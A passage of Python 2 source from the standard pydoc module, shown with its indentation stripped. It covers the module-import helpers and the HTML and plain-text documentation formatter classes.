return text.encode(encoding or _encoding, 'xmlcharrefreplace')
else:
return text
def _binstr(obj):
# Ensure that we have an encoded (binary) string representation of obj,
# even if it is a unicode string.
if isinstance(obj, _unicode):
return obj.encode(_encoding, 'xmlcharrefreplace')
return str(obj)
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not strip(line):
line = file.readline()
if not line: break
line = strip(line)
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not strip(line):
line = file.readline()
if not line: break
result = strip(split(line, '"""')[0])
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (None, None))
if lastupdate is None or lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
try:
file = open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = (module.__doc__ or '').splitlines()[0]
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
exc, value, tb = exc_info
self.filename = filename
self.exc = exc
self.value = value
self.tb = tb
def __str__(self):
exc = self.exc
if type(exc) is types.ClassType:
exc = exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Avoid simply calling reload() because it leaves names in
# the currently loaded module lying around if they're not
# defined in the new source file. Instead, remove the
# module from sys.modules and re-import. Also remove any
# submodules because they won't appear in the newly loaded
# module's namespace if they're already in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
# The import error occurred directly in this function,
# which means there is no such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in split(path, '.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError, message
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS",
"http://docs.python.org/library")
basedir = os.path.join(sys.exec_prefix, "lib",
"python"+sys.version[0:3])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&', '<', '<', '>', '>')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return _encode('''
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
<meta charset="utf-8">
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents), 'ascii')
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or ' ')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap=' '):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + ' ' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(expandtabs(text))
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)//cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100//cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, data):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = data
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return join(results, '')
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + join(parents, ', ') + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = split(name, '.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
(join(parts[:i+1], '.'), parts[i]))
linkedname = join(links + parts[-1:], '.')
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = '<a href="file:%s">%s</a>' % (url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = _binstr(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(_binstr(object.__date__)))
if info:
head = head + ' (%s)' % join(info, ', ')
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda key_value, s=self: s.modulelink(key_value[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
if hasattr(object, '__author__'):
contents = self.markup(_binstr(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(_binstr(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value, name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
pass
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
try:
attrs.sort(key=lambda t: t[0])
except TypeError:
attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % join(parents, ', ')
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br> </tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % self.classlink(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.im_func
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = map(lambda c, m=modname: classname(c, m), bases)
result = result + '(%s)' % join(parents, ', ')
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
try:
all = object.__all__
except AttributeError:
all = None
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE DOCS', docloc)
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', join(modpkgs, '\n'))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', join(submodules, '\n'))
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', join(contents, '\n'))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', join(contents, '\n'))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', join(contents, '\n'))
if hasattr(object, '__version__'):
version = _binstr(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', _binstr(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', _binstr(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', _binstr(object.__credits__))
return result
def docclass(self, object, name=None, mod=None, *ignored):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % join(parents, ', ')
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value,
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % classname(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.im_func
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
